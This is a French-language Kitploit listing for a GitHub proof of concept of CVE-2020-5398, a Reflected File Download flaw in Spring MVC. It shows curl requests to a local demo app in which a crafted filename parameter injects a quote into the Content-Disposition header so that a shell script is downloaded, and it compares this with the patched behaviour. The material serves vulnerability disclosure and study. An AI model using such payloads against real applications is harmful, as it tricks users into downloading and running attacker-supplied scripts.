Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-5398 — CVE-2020-5398 - Attaque RFD (Reflected File Download) pour Spring MVC | Kitploit
Outils/GitHubGitHub/motikan2010/cve-2020-5398
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubmotikan2010/cve-2020-5398

CVE-2020-5398

CVE-2020-5398 - Attaque RFD (Reflected File Download) pour Spring MVC

Voir le dépôt
8418il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-5398 - Attaque RFD (Reflected File Download) pour Spring MVC

Dans Spring Framework, versions 5.2.x antérieures à 5.2.3, versions 5.1.x antérieures à 5.1.13, et versions 5.0.x antérieures à 5.0.16, une application est vulnérable à une attaque de téléchargement de fichier réfléchi (RFD) lorsqu'elle définit un en-tête « Content-Disposition » dans la réponse, où l'attribut filename est dérivé d'une entrée fournie par l'utilisateur.

Utilisation

root@kitploit:~
./gradlew bootrun

Écoute sur 127.0.0.1:8080.

root@kitploit:~
$ curl 'http://127.0.0.1:8080/?filename=sample&contents=Hello,%20World' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.txt"
Content-Type: application/octet-stream
Content-Length: 12
Date: Fri, 17 Jan 2020 05:41:08 GMT

Hello, World

Lance le téléchargement du fichier sample.txt.

PoC

Version non sécurisée (Spring Web 5.2.2)

root@kitploit:~
curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:22:18 GMT

#!/bin/bash
id

Lance le téléchargement du fichier sample.sh. (Fichier Shell)

Version sécurisée (Spring Web 5.2.3)

root@kitploit:~
$ curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh\";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:24:47 GMT

#!/bin/bash
id

Lance le téléchargement du fichier sample.sh";.txt. (Fichier texte)

Références

  • CVE-2020-5398: Attaque RFD via l'en-tête « Content-Disposition » provenant de l'entrée de la requête par une application Spring MVC ou Spring WebFlux | Security | Pivotal
  • NVD - CVE-2020-5398
  • Qu'est-ce que l'attaque RFD ?
    • eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
    • Reflected File Download - OWASP
  • Correctif Commit
    • ContentDisposition refactoring · spring-projects/spring-framework@956ffe6
Télécharger l’outil